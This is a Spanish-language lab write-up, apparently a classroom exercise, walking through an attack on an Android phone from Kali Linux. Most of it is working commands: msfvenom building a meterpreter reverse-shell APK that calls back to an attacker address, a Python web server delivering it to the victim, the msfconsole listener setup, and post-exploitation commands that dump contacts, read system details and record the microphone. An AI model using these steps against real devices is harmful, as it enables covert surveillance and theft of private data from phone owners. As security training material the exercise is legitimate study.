# Práctica ataque Kali Linux a Android
En primer lugar, se va a crear la apk con la que se va a infectar a la víctima. Para ello, se puede usar el siguiente comando:
```bash
msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.6.2 LPORT=4444 R > malware.apk
```

![Ejecutar msfvenom](Imagenes/Imagen18.png)

Con este comando, estamos ejecutando el programa msfvenom.
- -p android/meterpreter/reverse_tcp: especifica el payload que se va a utilizar.
- LHOST=192.168.6.2: indica la ip a la que se mandarán los datos que se registren en la máquina Android, es decir, quien recibe el control.
- LPORT=4444: indica el puerto de entrada.
- R > malware.apk: indica el nombre que va a tener la aplicación cuando se descargue. 

Una vez hecho esto, para descargar la aplicación en Android, se va a hacer con un servidor web básico utilizando Python 2. Para ello se ejecutará el siguiente comando en la ubicación deseada, que será la que muestre el contenido:
```bash
python2 -m SimpleHTTPServer
```

![Servidor básico](Imagenes/Imagen19.png)

El servidor web se ejecutará en el puerto 8000 de forma predeterminada y servirá los archivos en el directorio actual a través de HTTP. Para ver una lista con los archivos en el directorio actual y poder navegar por ellos, se puede acceder poniendo "192.168.6.2:8000" en la barra de direcciones. Una vez hecho esto, tocaría descargar el archivo en Android, entrando a la IP mencionada anteriormente incluyendo el puerto.

![Descargar APK infectada](Imagenes/Imagen20.png)

Si se hace clic sobre malware.apk, automáticamente se descargará la aplicación.

Una vez descargada la aplicación, se debe desplegar un centro de control, que lo que hará será recoger toda la información de la víctima que se ha instalado la apk infectada. Para esto, se usará el programa msfconsole, con el siguiente comando:
```bash
msfconsole -q
```
Después, se deberá predefinir el módulo a usar, en este caso el mismo que se puso al crear la apk (use exploit/multi/handler): 
```bash
use exploit/multi/handler
```
Para configurar el payload, se pondrá el siguiente comando: 
```bash
set payload android/meterpreter/reverse_tcp
```
Estando ya todo configurado, bastará con especificar la ip del atacante, con el comando
```bash
set lhost 192.168.6.2
```
y escribir:
```bash
run
```

![Centro de control](Imagenes/Imagen21.png)

Hasta que no se instale la aplicación en Android, no nos mostrará la información de este, por lo que se va a proceder a la instalación en Android de esta aplicación.

![Instalar apk](Imagenes/Imagen22.png)

Una vez instalada, se debe abrir, y aunque no aparezca nada, ya estará la víctima infectada. Para asegurarse, se pude poner en el Kali Linux atacante
```bash
getuid
```
y aparecerá la víctima, lo que significa que todo ha salido correctamente. Para saber todas las posibilidades que tiene esta herramienta, se puede poner el comando 
```bash
help
```

![Comando getuid](Imagenes/Imagen23.png)

Por ejemplo:

Crear un archivo con todos los contactos de la máquina víctima:
```bash
dump_contacts
```

![Comando dump_contacts](Imagenes/Imagen24.png)

![Comando dump_contacts.1](Imagenes/Imagen25.png)

Recoger información del sistema, como la versión o el idioma:
```bash
sysinfo
```

![Comando sysinfo](Imagenes/Imagen26.png)

Grabar audio de un micrófono:
```bash
record_mic
```

Reproducir un archivo mp3 en la víctima:
```bash
play /rutaArchivo
```

![Comando play](Imagenes/Imagen27.png)